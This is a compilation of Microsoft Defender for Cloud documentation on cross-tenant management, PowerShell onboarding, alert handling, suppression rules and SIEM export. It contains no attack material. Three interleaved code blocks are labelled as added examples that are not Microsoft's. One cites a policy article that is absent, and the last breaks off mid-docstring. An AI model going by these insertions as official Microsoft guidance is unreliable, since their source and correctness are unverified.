Enable enhanced protections 


Cross-tenant management in Defender for Cloud


Article • 05/10/2023


Cross-tenant management enables you to view and manage the security posture of multiple tenants in Defender for Cloud by leveraging Azure Lighthouse. Manage multiple tenants efficiently, from a single view, without having to sign in to each tenant's directory.


- Service providers can manage the security posture of resources, for multiple customers, from within their own tenant.
- Security teams of organizations with multiple tenants can view and manage their security posture from a single location.


Set up cross-tenant management 


Azure delegated resource management is one of the key components of Azure 
Lighthouse. Set up cross-tenant management by delegating access to resources of 
managed tenants to your own tenant using these instructions from Azure Lighthouse's 
documentation: Onboard a customer to Azure Lighthouse. 


How does cross-tenant management work in Defender for Cloud?


You are able to review and manage subscriptions across multiple tenants in the same way that you manage multiple subscriptions in a single tenant.


From the top menu bar, click the filter icon, and select the subscriptions, from each tenant's directory, you'd like to view.


[Screenshot: the subscription filter in Defender for Cloud's top menu bar.]


The views and actions are basically the same. Here are some examples: 


- Manage security policies: From one view, manage the security posture of many resources with policies, take actions with security recommendations, and collect and manage security-related data.
- Improve Secure Score and compliance posture: Cross-tenant visibility enables you to view the overall security posture of all your tenants and where and how to best improve the secure score and compliance posture for each of them.
- Remediate recommendations: Monitor and remediate a recommendation for many resources from various tenants at one time. You can then immediately tackle the vulnerabilities that present the highest risk across all tenants.
- Manage Alerts: Detect alerts throughout the different tenants. Take action on resources that are out of compliance with actionable remediation steps.
- Manage advanced cloud defense features and more: Manage the various threat protection services, such as just-in-time (JIT) VM access, Adaptive network hardening, adaptive application controls, and more.


Next steps 


This article explains how cross-tenant management works in Defender for Cloud. To 
discover how Azure Lighthouse can simplify cross-tenant management within an 
enterprise which uses multiple Azure AD tenants, see Azure Lighthouse in enterprise 
scenarios. 


Quickstart: Automate onboarding of Microsoft Defender for Cloud using PowerShell


Article • 03/08/2023


You can secure your Azure workloads programmatically, using the Microsoft Defender 
for Cloud PowerShell module. Using PowerShell enables you to automate tasks and 
avoid the human error inherent in manual tasks. This is especially useful in large-scale 
deployments that involve dozens of subscriptions with hundreds and thousands of 
resources, all of which must be secured from the beginning. 


Onboarding Microsoft Defender for Cloud using PowerShell enables you to 
programmatically automate onboarding and management of your Azure resources and 
add the necessary security controls. 


This article provides a sample PowerShell script that can be modified and used in your 
environment to roll out Defender for Cloud across your subscriptions. 


In this example, we'll enable Defender for Cloud on a subscription with ID d07c0080-170c-4c24-861d-9c817742786c and apply the recommended settings that provide a high level of protection, by enabling Microsoft Defender for Cloud's enhanced security features, which provide advanced threat protection and detection capabilities:


1. Enable the enhanced security in Microsoft Defender for Cloud.
2. Set the Log Analytics workspace to which the Log Analytics agent will send the data it collects on the VMs associated with the subscription — in this example, an existing user-defined workspace (myWorkspace).
3. Activate Defender for Cloud's automatic agent provisioning, which deploys the Log Analytics agent.
4. Set the organization's CISO as the security contact for Defender for Cloud alerts and notable events.
5. Assign Defender for Cloud's default security policies.


Prerequisites 


These steps should be performed before you run the Defender for Cloud cmdlets: 


1. Run PowerShell as admin. 
2. Run the following commands in PowerShell: 
PowerShell 


Set-ExecutionPolicy -ExecutionPolicy AllSigned 


PowerShell 


Install-Module -Name Az.Security -Force 


Onboard Defender for Cloud using PowerShell
1. Register your subscriptions to the Defender for Cloud Resource Provider:


PowerShell


Set-AzContext -Subscription "d07c0080-170c-4c24-861d-9c817742786c"


PowerShell


Register-AzResourceProvider -ProviderNamespace 'Microsoft.Security'


2. Optional: Set the coverage level (Microsoft Defender for Cloud's enhanced security features on/off) of the subscriptions. If undefined, these features are off:


PowerShell


Set-AzContext -Subscription "d07c0080-170c-4c24-861d-9c817742786c"


PowerShell


Set-AzSecurityPricing -Name "VirtualMachines" -PricingTier "Standard"


3. Configure a Log Analytics workspace to which the agents will report. You must have a Log Analytics workspace that you already created, that the subscription's VMs will report to. You can define multiple subscriptions to report to the same workspace. If not defined, the default workspace will be used.


PowerShell


Set-AzSecurityWorkspaceSetting -Name "default" -Scope "/subscriptions/d07c0080-170c-4c24-861d-9c817742786c" -WorkspaceId "/subscriptions/d07c0080-170c-4c24-861d-9c817742786c/resourceGroups/myRg/providers/Microsoft.OperationalInsights/workspaces/myWorkspace"


4. Auto-provision installation of the Log Analytics agent on your Azure VMs:


PowerShell


Set-AzContext -Subscription "d07c0080-170c-4c24-861d-9c817742786c"


PowerShell


Set-AzSecurityAutoProvisioningSetting -Name "default" -EnableAutoProvision


Note


We recommend that you enable auto provisioning to make sure that your Azure virtual machines are automatically protected by Microsoft Defender for Cloud.


5. Optional: It's highly recommended that you define the security contact details for the subscriptions you onboard, which will be used as the recipients of alerts and notifications generated by Defender for Cloud:


PowerShell


Set-AzSecurityContact -Name "default1" -Email "CISO@my-org.com" -AlertAdmin -NotifyOnAlert


6. Assign the default Defender for Cloud policy initiative:


PowerShell


Register-AzResourceProvider -ProviderNamespace 'Microsoft.PolicyInsights'


PowerShell


$Policy = Get-AzPolicySetDefinition | where {$_.Properties.displayName -EQ 'Azure Security Benchmark'}

New-AzPolicyAssignment -Name 'ASC Default <d07c0080-170c-4c24-861d-9c817742786c>' -DisplayName 'Defender for Cloud Default <subscription ID>' -PolicySetDefinition $Policy -Scope '/subscriptions/d07c0080-170c-4c24-861d-9c817742786c'


You've successfully onboarded Microsoft Defender for Cloud with PowerShell. 


You can now use these PowerShell cmdlets with automation scripts to programmatically iterate across subscriptions and resources. This saves time and reduces the likelihood of human error. You can use this sample script as reference.
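The quickstart above onboards one subscription by hand; the PowerShell below, an added example that is not Microsoft's sample script, applies the same cmdlets to every subscription under a management group and, before changing anything, classifies each subscription the way the "Define compliance differently" variant of the policy from the earlier article would (any selected plan still on Free means non-compliant). The management group ID, plan list and contact address are placeholders; Get-SubscriptionsInManagementGroup and Get-FreePlans are this example's own helpers, and it assumes Az.Accounts, Az.Resources and Az.Security are installed and Connect-AzAccount has run.

```powershell
# Added example, not the Microsoft sample script. Assumes Az.Accounts, Az.Resources
# and Az.Security are installed and Connect-AzAccount has already run as a user
# with Security Admin on the subscriptions and Reader on the management group.
$managementGroupId = 'mg-production'                                         # placeholder
$plans             = @('VirtualMachines', 'StorageAccounts', 'SqlServers')   # plans to set to Standard
$contactEmail      = 'ciso@example.com'                                      # placeholder

function Get-SubscriptionsInManagementGroup {
    param([Parameter(Mandatory)] [string] $GroupName)
    # -Expand -Recurse returns the whole subtree; walk it and emit subscription IDs.
    $stack = [System.Collections.Generic.Stack[object]]::new()
    $stack.Push((Get-AzManagementGroup -GroupName $GroupName -Expand -Recurse))
    while ($stack.Count -gt 0) {
        $node = $stack.Pop()
        foreach ($child in @($node.Children | Where-Object { $null -ne $_ })) {
            if ($child.Type -match 'subscriptions') { $child.Name }   # Name holds the subscription ID
            else { $stack.Push($child) }                              # nested management group
        }
    }
}

function Get-FreePlans {
    # The same test the modified policy applies: a plan counts as enabled only on Standard.
    param([Parameter(Mandatory)] [string[]] $PlanNames)
    Get-AzSecurityPricing | Where-Object { $PlanNames -contains $_.Name -and $_.PricingTier -eq 'Free' }
}

$report = foreach ($subId in Get-SubscriptionsInManagementGroup -GroupName $managementGroupId) {
    Set-AzContext -Subscription $subId | Out-Null

    # Step 1 of the quickstart: register the Microsoft.Security resource provider once.
    $state = (Get-AzResourceProvider -ProviderNamespace 'Microsoft.Security' | Select-Object -First 1).RegistrationState
    if ($state -ne 'Registered') {
        Register-AzResourceProvider -ProviderNamespace 'Microsoft.Security' | Out-Null
    }

    # Step 2: record what the policy would have called non-compliant, then enable
    # only the plans that are still Free so the script is safe to re-run.
    $free = @(Get-FreePlans -PlanNames $plans)
    foreach ($plan in $free) {
        Set-AzSecurityPricing -Name $plan.Name -PricingTier 'Standard' | Out-Null
    }

    # Step 5: alert recipient, identical on every subscription.
    Set-AzSecurityContact -Name 'default1' -Email $contactEmail -AlertAdmin -NotifyOnAlert | Out-Null

    [pscustomobject]@{
        Subscription = $subId
        WasCompliant = ($free.Count -eq 0)      # true if every selected plan was already Standard
        PlansEnabled = ($free.Name -join ', ')  # plans this run switched to Standard
    }
}

$report | Format-Table -AutoSize
```

Steps 3 and 4 of the quickstart (workspace and auto-provisioning) are left out because the workspace resource ID differs per environment; add them inside the loop with the values from your own subscription.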


See also 


To learn more about how you can use PowerShell to automate onboarding to Defender 
for Cloud, see the following article: 


- Az.Security

To learn more about Defender for Cloud, see the following articles:


- Setting security policies in Microsoft Defender for Cloud. Learn how to configure security policies for your Azure subscriptions and resource groups.
- Managing and responding to security alerts in Microsoft Defender for Cloud. Learn how to manage and respond to security alerts.


Manage and respond to security alerts in Microsoft Defender for Cloud


Article • 03/28/2023


This topic shows you how to view and process Defender for Cloud's alerts and protect 
your resources. 


Advanced detections that trigger security alerts are only available with Microsoft 
Defender for Cloud's enhanced security features enabled. A free trial is available. To 
upgrade, see Enable enhanced protections. 


What are security alerts? 


Defender for Cloud collects, analyzes, and integrates log data from your Azure, hybrid, 
and multicloud resources, the network, and connected partner solutions, such as 
firewalls and endpoint agents. Defender for Cloud uses the log data to detect real 
threats and reduce false positives. A list of prioritized security alerts is shown in 
Defender for Cloud along with the information you need to quickly investigate the 
problem and the steps to take to remediate an attack. 


To learn about the different types of alerts, see Security alerts - a reference guide. 


For an overview of how Defender for Cloud generates alerts, see How Microsoft 
Defender for Cloud detects and responds to threats. 


Manage your security alerts 


1. From Defender for Cloud's overview page, select the Security alerts tile at the top of the page, or the link from the sidebar.

[Screenshot: Microsoft Defender for Cloud Overview page showing the Security alerts tile (121 alerts) alongside the Secure score, Regulatory compliance, Workload protections and Inventory tiles.]

The security alerts page opens.


[Screenshot: Security alerts page listing active alerts (for example "Suspicious process executed" and "Exposed Kubernetes dashboard detected") with affected resources, activity start times, MITRE ATT&CK tactics and status, plus filters for Status, Severity and Time.]


2. To filter the alerts list, select any of the relevant filters. You can optionally add 
further filters with the Add filter option. 


[Screenshot: the Add filter menu on the Security alerts page, offering Alert name, Affected resource, Resource type, MITRE ATT&CK tactics, Tags and Creator.]


The list updates according to the filtering options you've selected. For example, you might want to address security alerts that occurred in the last 24 hours because you are investigating a potential breach in the system.


Respond to security alerts 


1. From the Security alerts list, select an alert. A side pane opens and shows a description of the alert and all the affected resources.

[Screenshot: Security alerts list with the side pane open for an "Exposed Kubernetes dashboard detected" alert (High, Active), showing the alert description, the affected AKS cluster and subscription, the MITRE ATT&CK tactic Initial Access, and the View full details and Take action buttons.]


Tip

With this side pane open, you can quickly review the alerts list with the up and down arrows on your keyboard.


2. For further information, select View full details. 


The left pane of the security alert page shows high-level information regarding the security alert: title, severity, status, activity time, description of the suspicious activity, and the affected resource. The Azure tags for the affected resource help you to understand the organizational context of the resource.

The right pane includes the Alert details tab containing further details of the alert to help you investigate the issue: IP addresses, files, processes, and more.


[Screenshot: the security alert page for a "Potential SQL Injection" alert. The left pane shows severity (High), status (Active), activity time, the alert description (Potential SQL Injection was detected on your database Demo on server R-DEV\SQLEXPRESS), the affected resource (an Azure Arc machine tagged Env: Development), the subscription, and the intent (Pre-attack). The right pane's Alert details tab lists the client IP address, client IP location, client principal name, client application (.Net SqlClient Data Provider), related entities (account, Azure resource, host, network connection), OMS workspace and agent IDs, threat ID, potential causes (defect in application code), the vulnerable statement, and the detecting service (Microsoft)]


Also in the right pane is the Take action tab. Use this tab to take further actions regarding the security alert. Actions such as:

• Inspect resource context - sends you to the resource's activity logs that support the security alert
• Mitigate the threat - provides manual remediation steps for this security alert
• Prevent future attacks - provides security recommendations to help reduce the attack surface, increase security posture, and thus prevent future attacks
• Trigger automated response - provides the option to trigger a logic app as a response to this security alert
• Suppress similar alerts - provides the option to suppress future alerts with similar characteristics if the alert isn't relevant for your organization


[Screenshot: the Take action tab for the "Potential SQL Injection" alert, with the sections Inspect resource context (Open logs), Mitigate the threat, Prevent future attacks (listing the top active security recommendations for the affected machine), Trigger automated response, Suppress similar alerts, and Configure email notification settings]


Change the status of multiple security alerts at once


The alerts list includes checkboxes so you can handle multiple alerts at once. For 
example, for triaging purposes you might decide to dismiss all informational alerts for a 
specific resource. 


1. Filter according to the alerts you want to handle in bulk. 


In this example, we've selected all alerts with severity of ‘Informational’ for the 
resource 'ASC-AKS-CLOUD-TALK'. 


[Screenshot: the Security alerts list filtered to Severity == Informational and Affected resource == ASC-AKS-CLOUD-TALK, showing 33 informational "Manipulation of scheduled t..." alerts with the Persistence tactic, all Active]


2. Use the checkboxes to select the alerts to be processed - or use the checkbox at the top of the list to select them all.

In this example, we've selected all alerts. Notice that the Change status button is now available.


[Screenshot: the same filtered list with all 33 informational alerts selected and the Change status button now enabled]


3. Use the Change status options to set the desired status. 


[Screenshot: the Change status drop-down, with the options Active and Dismissed]

The alerts shown in the current page will have their status changed to the selected value.


See also

In this document, you learned how to view security alerts. See the following pages for related material:

• Configure alert suppression rules
• Automate responses to Defender for Cloud triggers
• Security alerts - a reference guide


Suppress alerts from Microsoft Defender for Cloud

This page explains how you can use alerts suppression rules to suppress false positives or other unwanted security alerts from Defender for Cloud.


Availability 


Aspect | Details
Release state: | General availability (GA)
Required roles and permissions: | Security admin and Owner can create/delete rules. Security reader and Reader can view rules.
Clouds: | Commercial clouds; National (Azure Government, Azure China 21Vianet)


What are suppression rules? 


The Microsoft Defender plans detect threats in your environment and generate security 
alerts. When a single alert isn't interesting or relevant, you can manually dismiss it. 
Suppression rules let you automatically dismiss similar alerts in the future. 


Just like when you identify an email as spam, you want to review your suppressed alerts 
periodically to make sure you're not missing any real threats. 


Some examples of how to use suppression rules are:

• Suppress alerts that you've identified as false positives
• Suppress alerts that are being triggered too often to be useful


[Screenshot: the Security alerts page with the Suppression rules button in the toolbar, above the active alerts by severity summary and the filtered alerts list]

Create a suppression rule


You can apply suppression rules to management groups or to subscriptions. 


• To suppress alerts for a management group, use Azure Policy.
• To suppress alerts for subscriptions, use the Azure portal or the REST API.


Alert types that were never triggered on a subscription or management group before 
the rule was created won't be suppressed. 


To create a rule for a specific alert in the Azure portal: 


1. From Defender for Cloud's security alerts page, select the alert you want to 
suppress. 


2. From the details pane, select Take action. 


3. In the Suppress similar alerts section of the Take action tab, select Create suppression rule.


4. In the New suppression rule pane, enter the details of your new rule. 


• Entities - The resources that the rule applies to. You can specify a single resource, multiple resources, or resources that contain a partial resource ID. If you don't specify any resources, the rule applies to all resources in the subscription.

• Name - A name for the rule. Rule names must begin with a letter or a number, be between 2 and 50 characters, and contain no symbols other than dashes (-) or underscores (_).

• State - Enabled or disabled.

• Reason - Select one of the built-in reasons or 'other' to specify your own reason in the comment.

• Expiration date - An end date and time for the rule. If you don't set an expiration date, the rule runs without any time limit.


5. Select Simulate to see the number of previously received alerts that would have been dismissed if the rule had been active.


6. Save the rule. 


You can also select the Suppression rules button in the Security Alerts page and select 
Create suppression rule to enter the details of your new rule. 


[Screenshot: the Suppression rules page, reached from Dashboard > Microsoft Defender for Cloud | Security alerts > Suppression rules, with the Create new suppression rule, Edit, Remove, and Learn more buttons]


Edit a suppression rule 


To edit a rule you've created from the suppression rules page: 


1. From Defender for Cloud's security alerts page, select Suppression rules at the top 
of the page. 


[Screenshot: the Microsoft Defender for Cloud | Security alerts page toolbar, with the Suppression rules button highlighted]


2. The suppression rules page opens with all the rules for the selected subscriptions. 


[Screenshot: the Suppression rules page listing two rules, Authentication_activity and Demo_machine_SSHbruteForce, with the columns Rule Name, Subscription Name, Rule Last Modified, Expiration Date, and Rule State (both Enabled)]


3. To edit a single rule, open the three dots (...) at the end of the rule and select Edit. 
4. Change the details of the rule and select Apply. 


To delete a rule, use the same three dots menu and select Remove. 


Create and manage suppression rules with the API


You can create, view, or delete alert suppression rules using the Defender for Cloud 
REST API. 


The relevant HTTP methods for suppression rules in the REST API are:

• PUT: To create or update a suppression rule in a specified subscription.

• GET:
  ◦ To list all rules configured for a specified subscription. This method returns an array of the applicable rules.
  ◦ To get the details of a specific rule on a specified subscription. This method returns one suppression rule.
  ◦ To simulate the impact of a suppression rule still in the design phase. This call identifies which of your existing alerts would have been dismissed if the rule had been active.

• DELETE: Deletes an existing rule (but doesn't change the status of alerts already dismissed by it).


For details and usage examples, see the API documentation. 
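The rule-creation flow in working form, as an added example that is not Microsoft's code: it enforces the rule-name constraints from step 4 above, builds the PUT target and JSON body, and runs a local stand-in for the Simulate step over constructed sample alerts. The ARM resource type Microsoft.Security/alertsSuppressionRules with api-version 2019-01-01-preview, the `in`/`contains` scope operators, the reason value, and the alert types in the sample data are assumptions, not taken from the page.

```python
"""Build, validate and locally pre-check a Defender for Cloud alert suppression rule.

Added example, not Microsoft's code. Assumed (not stated on the page): the ARM
resource type Microsoft.Security/alertsSuppressionRules with api-version
2019-01-01-preview and its `in` / `contains` scope operators. simulate() is a
local stand-in for the service-side Simulate call over constructed alerts.
"""
import re
from typing import Any, Dict, List, Optional

ARM_ENDPOINT = "https://management.azure.com"
API_VERSION = "2019-01-01-preview"

# Naming rule from the page: begins with a letter or digit, 2-50 characters,
# no symbols other than dashes and underscores.
RULE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{1,49}")


def validate_rule_name(name: str) -> bool:
    return RULE_NAME_RE.fullmatch(name) is not None


def suppression_rule_url(subscription_id: str, rule_name: str) -> str:
    """Target URL shared by PUT (create/update), GET (read) and DELETE."""
    if not validate_rule_name(rule_name):
        raise ValueError(f"invalid suppression rule name: {rule_name!r}")
    return (f"{ARM_ENDPOINT}/subscriptions/{subscription_id}/providers/"
            f"Microsoft.Security/alertsSuppressionRules/{rule_name}"
            f"?api-version={API_VERSION}")


def build_rule_body(alert_type: str, reason: str,
                    scope: Optional[List[Dict[str, Any]]] = None,
                    expiration_utc: Optional[str] = None,
                    comment: str = "", state: str = "Enabled") -> Dict[str, Any]:
    """JSON body for PUT (sent with a bearer token for the subscription).
    `scope` is a list of allOf conditions, e.g.
    {"field": "entities.ip.address", "in": ["203.0.113.10"]} or
    {"field": "entities.process.commandline", "contains": "scanner"}.
    No scope is the page's empty Entities field: the rule then covers every
    alert of that type in the subscription, so scope rules as tightly as you can."""
    props: Dict[str, Any] = {"alertType": alert_type, "reason": reason,
                             "state": state, "comment": comment}
    if expiration_utc:  # omitted for a rule with no time limit
        props["expirationDateUtc"] = expiration_utc
    if scope:
        props["suppressionAlertsScope"] = {"allOf": scope}
    return {"properties": props}


def _field_values(alert: Dict[str, Any], field: str) -> List[Any]:
    """Resolve 'entities.<type>.<property>' against the alert's entity list."""
    parts = field.split(".")
    if parts[0] == "entities" and len(parts) == 3:
        _, etype, prop = parts
        return [e[prop] for e in alert.get("entities", [])
                if e.get("type") == etype and prop in e]
    return [alert[field]] if field in alert else []


def _condition_matches(alert: Dict[str, Any], cond: Dict[str, Any]) -> bool:
    values = _field_values(alert, cond["field"])
    if "in" in cond:
        return any(v in cond["in"] for v in values)
    if "contains" in cond:
        needle = str(cond["contains"]).lower()
        return any(needle in str(v).lower() for v in values)
    raise ValueError(f"unsupported scope operator in {cond}")


def rule_suppresses(body: Dict[str, Any], alert: Dict[str, Any]) -> bool:
    """True when an enabled rule of the same alert type matches every condition."""
    props = body["properties"]
    if props["state"] != "Enabled" or alert["alertType"] != props["alertType"]:
        return False
    conds = props.get("suppressionAlertsScope", {}).get("allOf", [])
    return all(_condition_matches(alert, c) for c in conds)


def simulate(body: Dict[str, Any], alerts: List[Dict[str, Any]]) -> int:
    """How many of `alerts` the rule would have dismissed (cf. the Simulate button)."""
    return sum(1 for a in alerts if rule_suppresses(body, a))


SAMPLE_ALERTS = [  # constructed sample data, not real Defender alerts
    {"id": "a1", "alertType": "Sample_SSHBruteForce",
     "entities": [{"type": "ip", "address": "203.0.113.10"}]},
    {"id": "a2", "alertType": "Sample_SSHBruteForce",
     "entities": [{"type": "ip", "address": "198.51.100.7"}]},
    {"id": "a3", "alertType": "Sample_SuspiciousProcess",
     "entities": [{"type": "process", "commandline": "scanner.exe --full"}]},
]


def demo() -> int:
    """A tightly scoped rule: one alert type, one known scanner IP, with an expiry."""
    rule = build_rule_body(
        alert_type="Sample_SSHBruteForce", reason="FalsePositive",
        scope=[{"field": "entities.ip.address", "in": ["203.0.113.10"]}],
        expiration_utc="2030-01-01T00:00:00Z",
        comment="Authorized internal vulnerability scanner")
    return simulate(rule, SAMPLE_ALERTS)  # 1: only a1 matches, a2 stays visible
```

Review the count that simulate() returns the same way you would review the portal's Simulate number: a rule that would have dismissed far more alerts than the one you are looking at is scoped too broadly.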


Next steps 


This article described the suppression rules in Microsoft Defender for Cloud that automatically dismiss unwanted alerts. Learn more about security alerts:

• Security alerts generated by Defender for Cloud


Stream alerts to a SIEM, SOAR, or IT Service Management solution


Article e 03/08/2023 


Microsoft Defender for Cloud can stream your security alerts into the most popular 
Security Information and Event Management (SIEM), Security Orchestration Automated 
Response (SOAR), and IT Service Management (ITSM) solutions. Security alerts are 
notifications that Defender for Cloud generates when it detects threats on your 
resources. Defender for Cloud prioritizes and lists the alerts, along with the information 
needed for you to quickly investigate the problem. Defender for Cloud also provides 
detailed steps to help you remediate attacks. Alerts data is retained for 90 days. 


There are built-in Azure tools for ensuring you can view your alert data in all of the most 
popular solutions in use today, including: 


• Microsoft Sentinel
• Splunk Enterprise and Splunk Cloud
• IBM's QRadar
• ServiceNow
• ArcSight
• Power BI
• Palo Alto Networks


Stream alerts to Microsoft Sentinel 


Defender for Cloud natively integrates with Microsoft Sentinel, Azure's cloud-native 
SIEM and SOAR solution. 


Learn more about Microsoft Sentinel. 


Microsoft Sentinel's connectors for Defender for Cloud 


Microsoft Sentinel includes built-in connectors for Microsoft Defender for Cloud at the subscription and tenant levels:

• Stream alerts to Microsoft Sentinel at the subscription level
• Connect all subscriptions in your tenant to Microsoft Sentinel


When you connect Defender for Cloud to Microsoft Sentinel, the status of Defender for Cloud alerts that get ingested into Microsoft Sentinel is synchronized between the two services. So, for example, when an alert is closed in Defender for Cloud, that alert is also shown as closed in Microsoft Sentinel. If you change the status of an alert in Defender for Cloud, the status of the alert in Microsoft Sentinel is also updated, but the statuses of any Microsoft Sentinel incidents that contain the synchronized Microsoft Sentinel alert aren't updated.


You can enable the bi-directional alert synchronization feature to automatically sync 
the status of the original Defender for Cloud alerts with Microsoft Sentinel incidents that 
contain the copies of those Defender for Cloud alerts. So, for example, when a Microsoft 
Sentinel incident that contains a Defender for Cloud alert is closed, Defender for Cloud 
automatically closes the corresponding original alert. 


Learn more in Connect alerts from Microsoft Defender for Cloud. 


Note

The bi-directional alert synchronization feature isn't available in the Azure Government cloud.


Configure ingestion of all audit logs into Microsoft Sentinel


Another alternative for investigating Defender for Cloud alerts in Microsoft Sentinel is to stream your audit logs into Microsoft Sentinel:

• Connect Windows security events
• Collect data from Linux-based sources using Syslog
• Connect data from Azure Activity log


Tip

Microsoft Sentinel is billed based on the volume of data that it ingests for analysis in Microsoft Sentinel and stores in the Azure Monitor Log Analytics workspace. Microsoft Sentinel offers a flexible and predictable pricing model. Learn more at the Microsoft Sentinel pricing page.


Stream alerts to QRadar and Splunk 


The export of security alerts to Splunk and QRadar uses Event Hubs and a built-in connector. You can either use a PowerShell script or the Azure portal to set up the requirements for exporting security alerts for your subscription or tenant. Then you'll need to use the procedure specific to each SIEM to install the solution in the SIEM platform.


Prerequisites 


Before you set up the Azure services for exporting alerts, make sure you have: 


• Azure subscription (Create a free account)
• Azure resource group (Create a resource group)
• Owner role on the alerts scope (subscription, management group or tenant), or these specific permissions:
  ◦ Write permissions for event hubs and the Event Hub Policy
  ◦ Create permissions for Azure AD applications, if you aren't using an existing Azure AD application
  ◦ Assign permissions for policies, if you're using the Azure Policy 'DeployIfNotExists'


Step 1. Set up the Azure services


You can set up your Azure environment to support continuous export using either: 


• A PowerShell script (Recommended)

  Download and run the PowerShell script. Enter the required parameters and the script performs all of the steps for you. When the script finishes, it outputs the information you'll use to install the solution in the SIEM platform.

• The Azure portal

  Here's an overview of the steps you'll do in the Azure portal:

  1. Create an Event Hubs namespace and event hub.
  2. Define a policy for the event hub with "Send" permissions.
  3. If you're streaming alerts to QRadar - Create an event hub "Listen" policy, then copy and save the connection string of the policy that you'll use in QRadar.
  4. Create a consumer group, then copy and save the name that you'll use in the SIEM platform.
  5. Enable continuous export of security alerts to the defined event hub.
  6. If you're streaming alerts to QRadar - Create a storage account, then copy and save the connection string to the account that you'll use in QRadar.
  7. If you're streaming alerts to Splunk:
     a. Create an Azure Active Directory (AD) application.
     b. Save the Tenant, App ID, and App password.
     c. Give permissions to the Azure AD Application to read from the event hub you created before.

  For more detailed instructions, see Prepare Azure resources for exporting to Splunk and QRadar.


Step 2. Connect the event hub to your preferred solution using the built-in connectors


Each SIEM platform has a tool to enable it to receive alerts from Azure Event Hubs. 
Install the tool for your platform to start receiving alerts. 


Tool | Hosted in Azure | Description
IBM QRadar | No | The Microsoft Azure DSM and Microsoft Azure Event Hubs Protocol are available for download from the IBM support website.
Splunk | No | Splunk Add-on for Microsoft Cloud Services is an open source project available in Splunkbase. If you can't install an add-on in your Splunk instance, for example if you're using a proxy or running on Splunk Cloud, you can forward these events to the Splunk HTTP Event Collector using Azure Function For Splunk, which is triggered by new messages in the event hub.


Stream alerts with continuous export 


To stream alerts into ArcSight, SumoLogic, Syslog servers, LogRhythm, Logz.io Cloud 
Observability Platform, and other monitoring solutions, connect Defender for Cloud 
using continuous export and Azure Event Hubs: 


Note

To stream alerts at the tenant level, use this Azure policy and set the scope at the root management group. You'll need permissions for the root management group as explained in Defender for Cloud permissions: Deploy export to an event hub for Microsoft Defender for Cloud alerts and recommendations.


1. Enable continuous export to stream Defender for Cloud alerts into a dedicated event hub at the subscription level. To do this at the Management Group level using Azure Policy, see Create continuous export automation configurations at scale.


2. Connect the event hub to your preferred solution using the built-in connectors: 


Tool | Hosted in Azure | Description
SumoLogic | No | Instructions for setting up SumoLogic to consume data from an event hub are available at Collect Logs for the Azure Audit App from Event Hubs.
ArcSight | No | The ArcSight Azure Event Hubs smart connector is available as part of the ArcSight smart connector collection.
Syslog server | No | If you want to stream Azure Monitor data directly to a syslog server, you can use a solution based on an Azure function.
LogRhythm | No | Instructions to set up LogRhythm to collect logs from an event hub are available here.
Logz.io | Yes | For more information, see Getting started with monitoring and logging using Logz.io for Java apps running on Azure.


3. Optionally, stream the raw logs to the event hub and connect to your preferred 
solution. Learn more in Monitoring data available. 


To view the event schemas of the exported data types, visit the Event Hubs event schemas.


Use the Microsoft Graph Security API to stream alerts to third-party applications


As an alternative to Microsoft Sentinel and Azure Monitor, you can use Defender for Cloud's built-in integration with Microsoft Graph Security API. No configuration is required.


You can use this API to stream alerts from your entire tenant (and data from many 
Microsoft Security products) into third-party SIEMs and other popular platforms: 


• Splunk Enterprise and Splunk Cloud - Use the Microsoft Graph Security API Add-On for Splunk
• Power BI - Connect to the Microsoft Graph Security API in Power BI Desktop.
• ServiceNow - Install and configure the Microsoft Graph Security API application from the ServiceNow Store.
• QRadar - Use IBM's Device Support Module for Microsoft Defender for Cloud via Microsoft Graph API.
• Palo Alto Networks, Anomali, Lookout, InSpark, and more - Use the Microsoft Graph Security API.


Next steps 


This page explained how to ensure your Microsoft Defender for Cloud alert data is 
available in your SIEM, SOAR, or ITSM tool of choice. For related material, see: 


• What is Microsoft Sentinel?
• Alert validation in Microsoft Defender for Cloud - Verify your alerts are correctly configured
• Continuously export Defender for Cloud data


Prepare Azure resources for exporting to Splunk and QRadar


Article e 10/11/2023 


In order to stream Microsoft Defender for Cloud security alerts to IBM QRadar and 
Splunk, you have to set up resources in Azure, such as Event Hubs and Microsoft Entra 
ID. Here are the instructions for configuring these resources in the Azure portal, but you 
can also configure them using a PowerShell script. Make sure you review Stream alerts 
to QRadar and Splunk before you configure the Azure resources for exporting alerts to 
QRadar and Splunk. 


To configure the Azure resources for QRadar and Splunk in the Azure portal: 


Step 1: Create an Event Hubs namespace and event hub with send permissions


1. In the Event Hubs service, create an Event Hubs namespace: 
a. Select Create. 
b. Enter the details of the namespace, select Review + create, and select Create. 


[Screenshot: the Create Namespace pane in Event Hubs, Basics tab, with the project details (subscription, resource group), instance details (namespace name, location, pricing tier) and throughput units]


2. Create an event hub: 
a. In the namespace that you create, select + Event Hub. 
b. Enter the details of the event hub, and select Review + create, and select 
Create. 


3. Create a shared access policy.
   a. In the Event Hub menu, select the Event Hubs namespace you created.
   b. In the Event Hub namespace menu, select Event Hubs.
   c. Select the event hub that you just created.
   d. In the event hub menu, select Shared access policies.
   e. Select Add, enter a unique policy name, and select Send.
   f. Select Create to create the policy.


[Screenshot: the Shared access policies page of the alertstootherSIEM Event Hubs namespace, listing the RootManageSharedAccessKey policy (Manage, Send, Listen) with the Add SAS Policy pane open]


Step 2: For streaming to QRadar SIEM - Create a Listen policy

1. Select Add, enter a unique policy name, and select Listen. 

2. Select Create to create the policy. 


3. After the listen policy is created, copy the Connection string primary key and save 
it to use later. 


[Screenshot: the Shared access policies page listing RootManageSharedAccessKey (Manage, Send, Listen), continuousexport (Send) and listenpolicy (Listen), with the SAS Policy: listenpolicy pane showing the policy's keys and connection strings]


Step 3: Create a consumer group, then copy and save the name to use in the SIEM platform


1. In the Entities section of the Event Hubs event hub menu, select Event Hubs and select the event hub you created.

[Screenshot: the Event Hubs list of the alertstootherSIEM namespace, with the columns Name, Status, Message Retention, and Partition Count]

2. Select Consumer group.
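What a consumer does with the Listen policy's connection string from Step 2, as an added example that is neither the page's nor Microsoft's code: an Event Hubs client never sends the policy key itself, it derives short-lived HMAC-SHA256 SAS tokens scoped to one event hub, which is why the copied connection string must be handled as a credential and why the SIEM should get a Listen-only policy rather than RootManageSharedAccessKey. The namespace, hub name and key below are constructed placeholders; the token layout follows the standard Event Hubs SAS scheme.

```python
"""Derive and verify an Event Hubs SAS token from a shared access policy connection string.

Added example, not from the page or from Microsoft. The connection string is
constructed and its key is a placeholder; the signing scheme (HMAC-SHA256 over
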